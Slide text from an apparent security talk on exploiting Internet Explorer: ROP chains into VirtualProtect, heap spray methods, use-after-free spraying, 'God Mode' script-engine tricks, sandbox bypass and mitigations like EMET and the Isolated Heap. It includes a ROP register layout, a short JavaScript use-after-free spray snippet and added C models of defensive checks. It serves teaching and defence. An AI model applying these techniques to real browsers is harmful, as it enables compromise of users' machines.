EAX Nop (0x90909090)
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x140
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
Return Oriented Programming
VirtualProtect(shellcode address, shellcode size, Permission, Writable location);
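The chain traced above pivots ESP into the heap (XCHG EAX, ESP) and then enters VirtualProtect through a RETN instead of a CALL. EMET, mentioned on the Pwn2Own slide and again under "Latest Protect Method", checks exactly those two properties when a critical API is entered. The C code below is an added example, not the talk's code and not EMET's implementation: it models the StackPivot check (ESP must lie inside the thread's stack as recorded by StackBase/StackLimit in the TEB) and the Caller check (the bytes just before the return address must decode to a CALL). The stack bounds, ESP values and byte sequences in main are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Thread stack bounds as the TEB records them: StackBase is the high end, StackLimit the low end. */
typedef struct {
    uint32_t stack_base;
    uint32_t stack_limit;
} thread_stack;

/* StackPivot check: on entry to a critical API (VirtualProtect, VirtualAlloc, ...) ESP must lie
   inside the calling thread's own stack. After "XCHG EAX, ESP" into a sprayed heap block ESP is
   far outside [StackLimit, StackBase) and the call is refused. */
static int stack_pivot_detected(uint32_t esp, thread_stack ts) {
    return !(esp >= ts.stack_limit && esp < ts.stack_base);
}

/* If the `len` bytes at p begin with a CALL instruction, return its encoded length, else 0.
   Handles E8 rel32 and the FF /2 indirect forms (register, [reg], [reg+disp8], [reg+disp32],
   [disp32] and their SIB variants); 16-bit-prefixed and far calls are not modelled. */
static size_t call_length(const uint8_t *p, size_t len) {
    if (len >= 5 && p[0] == 0xE8) return 5;
    if (len >= 2 && p[0] == 0xFF && (p[1] & 0x38) == 0x10) {         /* FF /2 */
        uint8_t mod = p[1] >> 6, rm = p[1] & 7;
        size_t n = 2;
        if (mod == 3) return n;                                       /* call reg, e.g. FF D4 = call esp */
        if (rm == 4) {                                                /* SIB byte follows */
            if (len < 3) return 0;
            n += 1;
            if (mod == 0 && (p[2] & 7) == 5) n += 4;                  /* [index*scale + disp32] */
        }
        if (mod == 1) n += 1;                                         /* disp8 */
        else if (mod == 2 || (mod == 0 && rm == 5)) n += 4;           /* disp32, incl. FF 15 [IAT slot] */
        return n <= len ? n : 0;
    }
    return 0;
}

/* Caller check: a legitimate entry arrives through a CALL, so some CALL encoding must end exactly
   at the return address. A RETN into the API, as in the chain above, leaves gadget bytes there. */
static int preceded_by_call(const uint8_t *code, size_t ret_off) {
    for (size_t n = 2; n <= 7; n++)
        if (ret_off >= n && call_length(code + ret_off - n, n) == n) return 1;
    return 0;
}

/* Combined policy: allow the critical call only if neither check fires. */
static int critical_call_allowed(uint32_t esp, thread_stack ts, const uint8_t *code, size_t ret_off) {
    return !stack_pivot_detected(esp, ts) && preceded_by_call(code, ret_off);
}

int main(void) {
    /* Constructed values: a 16 KiB thread stack, one ESP inside it and one pointing into a
       sprayed heap region. */
    thread_stack ts = { 0x00130000, 0x0012c000 };
    uint32_t esp_normal = 0x0012f8a0, esp_pivoted = 0x0a040100;

    /* Constructed code bytes: "call [0x12345678]; test eax,eax" (return address at offset 6)
       versus a "pop eax; ret" gadget whose end is used as the return address (offset 2). */
    const uint8_t legit[]  = { 0xFF, 0x15, 0x78, 0x56, 0x34, 0x12, 0x85, 0xC0 };
    const uint8_t gadget[] = { 0x58, 0xC3, 0x90 };

    printf("normal call : pivot=%d caller_ok=%d allowed=%d\n",
           stack_pivot_detected(esp_normal, ts), preceded_by_call(legit, 6),
           critical_call_allowed(esp_normal, ts, legit, 6));
    printf("ROP chain   : pivot=%d caller_ok=%d allowed=%d\n",
           stack_pivot_detected(esp_pivoted, ts), preceded_by_call(gadget, 2),
           critical_call_allowed(esp_pivoted, ts, gadget, 2));
    return 0;
}
```

Both checks are heuristics rather than proofs. The Caller check is satisfied by any CALL encoding that happens to end at the return address (the `& call esp` slot the chain above places in EBP is such a case), which is why the stack-bounds test is layered on top of it, and why the talk lists a separate Mitigation Bypass Bounty: defeating the pair is its own research problem.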
ROP with non-ASLR Module Targeting
• get Information with User-Agent
• OS Type and Version
• Browser Type and Version
• Language
• Installed Module
ROP with non-ASLR Module Targeting
Play with Baby
Exploit-db (CVE-2012-4969)
SW Bug (UAF)
Bypass ASLR (Precise Heap Spray)
Bypass DEP (ROP)
Waah...
• pointer information leakage
• catch Base Address of the Module with Memory Leak Vulnerability.
• make relative ROP!!
ROP with Memory Leak Vuln.
ROP with Memory Leak Vuln.
• DEPS (DOM Element Property Spray)
• HTML5 Spray
• VBscript or Jscript
• ActionScript
Advance Heap Spray
DEPS (DOM Element Property Spray)
CVE-2013-3893
• Canvas – full access to pixel data => Full memory control in consecutive heap pages.
• WebWorker – Thread! Fast!
HTML5 Spray
HTML5 Spray
HTML5 Spray
VBscript Heap Spray (cve-2013-3918)
VBscript Heap Spray (cve-2013-3918)
• use Flash Player to bypass DEP/ASLR
• <embed src=spray.swf allowScriptAccess="always" allowNetworking="all" TYPE="application/x-shockwave-flash" width="10" height="10">
• http://www.greyhathacker.net/?p=717
ActionScript Heap Spray
CVE-2014-0322
• GIFT (Got It From a Table)
• Vital Point Strike
• DVE
• ExpLib2
• Heap Feng Shui in jscript 9
Advanced Techniques
• Exploit “ASLR-free” zones
• SharedUserData @ 0x7ffe0000
• LdrHotPatchRoutine
GIFT (Got It From a Table)
GIFT (Got It From a Table)
• But, Windows 8 has already solved these problems
apply to CVE-2012-4969
Vital Point Strike
• Out-Of-Bounds Write
• array/vector object modification technique
(full process memory access)
• modify “SafetyOption” flag of the script engine
(to enable “God Mode”)
• run Active X (do anything)
Vital Point Strike
• http://www.secniu.com/how-to-use-vbscript-to-turn-on-the-god-mode/
• https://community.rapid7.com/community/metasploit/blog/2014/04/07/hack-away-at-the-unessential-with-explib2-in-metasploit
• http://www.secniu.com/the-art-of-leaks-the-return-of-heap-feng-shuidemo-code/
• http://blog.fortinet.com/post/advanced-exploit-techniques-attacking-the-ie-script-engine
• http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b
Advanced Techniques
(lol)
But,
S/W Bugs => Bypass Mitigation => Bypass Sandbox => Exploit!
How to Damn it?
• DEP + ASLR + EMET(ASR, EAF+) + CFI
• VTguard
• Isolated Heap
• Sandbox
• https://twitter.com/defendtheworld(SecuInside 2014)
Latest Protect Method
VTguard
• great Defense against UAF
• do not share the same heap between IE's objects.
Isolated Heap
e2.parentNode.removeChild(e2);                            // object freed; e1 still refers to it (dangling)
var S = new String("\u3138\u3138");
for (var i = 0; i < 20000; i++) S += "\u3138\u3138";      // spray string: bytes 38 31 38 31 ... in memory
e1.innerHTML = S;                                         // use through the dangling reference

[Figure, repeated from the Use After Free slide: the freed object's memory (xxxxxxxx) and, after the spray, the string S (31383138 31383138 ...) occupying it. Shown as Before/After the Isolated Heap, where the DOM object and the string data no longer come from the same heap.]
Isolated Heap
Before
After
• HTML and SVG DOM Element
• CDOMTextNode
• CTextNodeMarkupPointer
• CMarkupPointer
• CTraversalNodeIterator
• CDomRange
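The "do not share the same heap between IE's objects" bullet is the whole idea of the Isolated Heap, and the textarea figure is the scenario it defeats. The C program below is an added teaching model, not IE code and not the talk's: a toy fixed-size pool with a LIFO free list stands in for one heap size class, a struct whose first word is a vtable pointer stands in for the textarea object, and the spray string is the 38 31 38 31 byte pattern of S. With one shared pool the string is handed the freed object's slot and the dangling pointer's vtable becomes attacker data; with DOM objects and strings in separate pools the dangling pointer sees only the poisoned free slot. The poison byte 0xFE, the slot size and the pool sizes are assumptions of the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SLOT_SIZE    32
#define SLOTS        8
#define FREED_POISON 0xFE   /* written into a freed slot; stands in for the figure's xxxxxxxx */

/* Toy size-class pool: fixed-size slots with a LIFO free list, so the most recently freed
   slot is the first one handed out again (the reuse a UAF exploit relies on). */
typedef struct {
    uint8_t mem[SLOTS][SLOT_SIZE];
    int     free_list[SLOTS];
    int     nfree;
} pool;

static void pool_init(pool *p) {
    memset(p->mem, 0, sizeof p->mem);
    p->nfree = 0;
    for (int i = SLOTS - 1; i >= 0; i--) p->free_list[p->nfree++] = i;   /* slot 0 is served first */
}

static void *pool_alloc(pool *p) {
    return p->nfree > 0 ? p->mem[p->free_list[--p->nfree]] : NULL;
}

static void pool_free(pool *p, void *ptr) {
    int idx = (int)(((uint8_t *)ptr - (uint8_t *)p->mem) / SLOT_SIZE);
    memset(ptr, FREED_POISON, SLOT_SIZE);
    p->free_list[p->nfree++] = idx;
}

/* A DOM-like object: the first word is the vtable pointer a virtual call dereferences. */
typedef struct {
    uintptr_t vtable;
    uint8_t   rest[SLOT_SIZE - sizeof(uintptr_t)];
} dom_node;

static const int real_vtable = 0;                   /* stands in for the genuine textarea vtable */

/* The word the spray string S ("\u3138\u3138...") leaves in memory: UTF-16LE bytes 38 31 38 31 ... */
static uintptr_t spray_word(void) {
    uint8_t b[sizeof(uintptr_t)];
    for (size_t i = 0; i < sizeof b; i++) b[i] = (i & 1) ? 0x31 : 0x38;
    uintptr_t w;
    memcpy(&w, b, sizeof w);
    return w;
}

/* The word a freed, poisoned slot holds. */
static uintptr_t poison_word(void) {
    uintptr_t w;
    memset(&w, FREED_POISON, sizeof w);
    return w;
}

/* Replays the textarea scenario: e1 and e2 reference the same object, removeChild frees it,
   then the spray string is allocated. Returns the vtable word seen through the dangling e1.
   isolated = 0: DOM objects and string data share one pool (IE before the Isolated Heap).
   isolated = 1: strings come from a separate pool, so they can never land in the freed slot. */
static uintptr_t dangling_vtable_after_spray(int isolated) {
    pool node_pool, string_pool;
    pool_init(&node_pool);
    pool_init(&string_pool);
    pool *strings = isolated ? &string_pool : &node_pool;

    dom_node *e1 = pool_alloc(&node_pool);          /* the <textarea id="UknowY"> object */
    e1->vtable = (uintptr_t)&real_vtable;
    dom_node *e2 = e1;                              /* second reference to the same object */

    pool_free(&node_pool, e2);                      /* e2.parentNode.removeChild(e2): e1 now dangles */

    uint8_t *s = pool_alloc(strings);               /* e1.innerHTML = S: the spray string is stored */
    for (size_t i = 0; i < SLOT_SIZE; i += 2) { s[i] = 0x38; s[i + 1] = 0x31; }

    return e1->vtable;                              /* what a virtual call through e1 would use */
}

static const char *describe(uintptr_t vtable) {
    if (vtable == spray_word())  return "attacker data (spray reclaimed the freed object)";
    if (vtable == poison_word()) return "poisoned free slot (a crash, not control)";
    return "intact vtable";
}

int main(void) {
    printf("shared heap  : vtable = %s\n", describe(dangling_vtable_after_spray(0)));
    printf("isolated heap: vtable = %s\n", describe(dangling_vtable_after_spray(1)));
    return 0;
}
```

The bug itself is untouched: e1 dangles in both runs. What the isolated heap removes is the attacker's ability to decide what the freed memory contains by allocating a differently typed object of the same size, which is the step the slide's figure depends on.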
IE Protected Mode (Sandbox)
• Bypass Enhanced Protected Mode
• Modify Registry Key
• Use COM Object
• Privilege Escalation
• Use Kernel Exploit
• ...
Bypass Sandbox
• http://conference.hitb.org/hitbsecconf2013kul/materials/D2T1%20-%20Mark%20Vincent%20Yason%20-%20Diving%20Into%20IE10's%20Enhanced%20Protected%20Mode%20Sandbox.pdf
• http://monsterz.kr/wp-content/uploads/2014/08/Newbies-Travels-To-Sandbox.pdf
• https://github.com/tyranid/IE11SandboxEscapes
• https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf
Bypass Sandbox
No, Just Back to the Basic!
"To become a hacker, don't just chase trends; stay faithful to the fundamentals."
Reference (URL)
1. [exploit technique]
2. http://www.garage4hackers.com/content.php?r=143-Beginners-Guide-to-Use-after-free-Exploits-IE-6-0-day-Exploit-Development
3. https://labs.mwrinfosecurity.com/system/assets/538/original/mwri_polishing-chrome-slides-nsc_2013-09-06.pdf
4. https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
5. http://fuzzysecurity.com/tutorials/expDev/11.html
6. http://packetstormsecurity.com/files/116320/Internet-Explorer-Script-Interjection-Code-Execution.html
7. http://ifsec.blogspot.kr/2013/11/exploiting-internet-explorer-11-64-bit.html
8. https://code.google.com/p/chromium/issues/detail?id=352369&can=1&q=vupen&colspec=ID%20Pri%20M%20Iteration%20ReleaseBlock%20Cr%20Status%20Owner%20Summary%20OS%20Modified
9. http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf
10. https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf
11. http://blog.fortinet.com/Advanced-Exploit-Techniques-Attacking-the-IE-Script-Engine/
12. https://www.blackhat.com/us-14/archives.html#svg-exploiting-browsers-without-image-parsing-bugs
13. http://www.secniu.com/the-art-of-leaks-the-return-of-heap-feng-shuidemo-code/
14. http://blog.exodusintel.com/2013/11/26/browser-weakest-byte/
15. https://github.com/rapid7/metasploit-framework/blob/master/test/modules/exploits/test/explib2_ie11_exec_test_case.rb
16. https://community.rapid7.com/community/metasploit/blog/2014/04/07/hack-away-at-the-unessential-with-explib2-in-metasploit
17. http://www.secniu.com/how-to-use-vbscript-to-turn-on-the-god-mode/
18. http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b
19. [CVE Analysis]
20. http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/
21. http://www.exploit-db.com/wp-content/themes/exploit/docs/20084.pdf
22. http://www.exploit-db.com/wp-content/themes/exploit/docs/21832.pdf
23. http://pgnsc.tistory.com/348
24. http://training.nshc.net/KOR/Document/vuln/20130405_Microsoft_Internet_Explorer_CButton%20Object_Use_After_Free_Vulnerability.pdf
25. http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html
26. http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Microsoft-IE-zero-day-and-recent-exploitation-trends-CVE-2014/ba-p/6461820
27. http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/The-mechanism-behind-Internet-Explorer-CVE-2014-1776-exploits/ba-p/6476220
28. http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Double-Dip-Using-the-latest-IE-0-day-to-get-RCE-and-an-ASLR/ba-p/6466280
29. http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html
30. http://hdwsec.fr/blog/CVE-2014-0322.html
31. [Mitigation]
32. http://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller_Exploit_Mitigation_Slides.pdf
33. http://blog.trendmicro.com/trendlabs-security-intelligence/isolated-heap-for-internet-explorer-helps-mitigate-uaf-exploits/
34. https://labs.mwrinfosecurity.com/blog/2014/06/20/isolated-heap-friends---object-allocation-hardening-in-web-browsers/
35. http://researchcenter.paloaltonetworks.com/2014/07/beginning-end-use-free-exploitation/#more-6158
36. http://www.contextis.com/blog/windows-mitigaton-bypass/
37. [Bypass Sandbox]
38. http://monsterz.kr/wp-content/uploads/2014/08/Newbies-Travels-To-Sandbox.pdf
39. https://github.com/tyranid/IE11SandboxEscapes
40. http://www.contextis.com/documents/79/IE_Sandbox_Escapes_Presentation.pdf
41. http://conference.hitb.org/hitbsecconf2013kul/materials/D2T1%20-%20Mark%20Vincent%20Yason%20-%20Diving%20Into%20IE10's%20Enhanced%20Protected%20Mode%20Sandbox.pdf
42. http://neilscomputerblog.blogspot.kr/2014/04/vtguard.html
43. http://hacksum.net/?p=2030
Reference (twitter)
@WTFuzz @lcamtuf @tiraniddo @tombkeeper @ifsecure @kingcope @tentacolo_Viola @stephenfewer @trimosx @HaifeiLi @defendtheworld @j00ru @corelanc0d3r @_sinn3r @sickness416 @Ivanlef0u @alexsotirov @VUPEN @mwrlabs @SophosLabs @CTXIS @44CON @CanSecWest @SyScan @deepsec @phdays @Pwn2Own_Contest ...
Q & A
Phew, how do I even start...
THANK YOU